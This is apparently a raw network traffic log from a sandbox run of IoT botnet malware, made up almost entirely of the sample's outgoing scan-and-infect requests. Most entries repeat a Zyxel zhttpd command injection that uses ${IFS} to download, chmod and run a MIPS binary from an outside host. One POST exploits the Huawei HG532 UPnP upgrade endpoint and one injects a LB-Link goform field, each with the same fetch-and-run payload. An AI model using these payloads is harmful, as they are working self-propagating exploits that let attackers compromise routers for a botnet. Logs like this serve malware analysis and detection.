                                          Jan 14, 2024 15:46:24.151052952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6382192.168.2.235762635.246.100.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151098967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6383192.168.2.2358364189.184.239.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151149035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6384192.168.2.2357872160.206.156.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151174068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6385192.168.2.235084478.55.182.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151199102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6386192.168.2.235383212.121.79.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151228905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6387192.168.2.2341592210.43.148.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151247978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6388192.168.2.2345048212.76.98.18837215
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.124906063 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 475
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6389192.168.2.2355530123.231.205.278080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.135571003 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6390192.168.2.235695212.42.48.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188546896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6391192.168.2.2360512217.32.30.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188591957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6392192.168.2.2350434162.26.83.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188652039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6393192.168.2.235550670.68.31.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188684940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6394192.168.2.2350382217.63.231.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188699961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6395192.168.2.234228495.61.86.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188741922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6396192.168.2.2344786187.89.147.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188767910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6397192.168.2.2344562145.7.124.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188791990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6398192.168.2.233982241.139.115.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188833952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6399192.168.2.2335494158.193.179.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188858986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6400192.168.2.2350272152.83.245.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188906908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6401192.168.2.234363287.189.209.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188922882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6402192.168.2.2347584181.211.134.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188942909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6403192.168.2.235690857.172.53.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188970089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6404192.168.2.234653692.115.16.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.188996077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6405192.168.2.23558788.200.162.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189052105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6406192.168.2.2351594204.128.178.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189063072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6407192.168.2.2339746223.162.174.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189101934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6408192.168.2.23606824.232.221.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189124107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6409192.168.2.235705083.108.150.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189162016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6410192.168.2.2344154179.6.128.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189174891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6411192.168.2.2352456112.53.159.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189215899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6412192.168.2.2354588209.46.97.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189237118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6413192.168.2.2345198132.100.208.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189270020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6414192.168.2.2356286184.190.253.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189312935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6415192.168.2.233613474.37.95.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189337015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6416192.168.2.2334006196.255.4.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189369917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6417192.168.2.233938286.108.251.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189393997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6418192.168.2.233316881.56.221.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189424992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6419192.168.2.233348660.210.220.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189435959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6420192.168.2.233535820.180.106.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189487934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6421192.168.2.233860417.93.51.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189522028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6422192.168.2.234568090.112.243.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189547062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6423192.168.2.2333468161.221.78.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189567089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6424192.168.2.2345884201.6.186.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189584017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6425192.168.2.234059458.32.61.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189610004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6426192.168.2.2335538130.168.245.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189650059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6427192.168.2.2343490175.165.151.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189682007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6428192.168.2.235520485.213.0.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189735889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6429192.168.2.2342036116.127.65.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189740896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6430192.168.2.2338920110.211.162.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189769030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6431192.168.2.234656888.174.45.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189785004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6432192.168.2.2359376184.58.100.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189824104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6433192.168.2.23374664.80.219.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189845085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6434192.168.2.2351904172.118.7.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189872026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6435192.168.2.2333524153.200.131.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189897060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6436192.168.2.2341634107.215.185.231443
                                          TimestampBytes transferredDirectionData
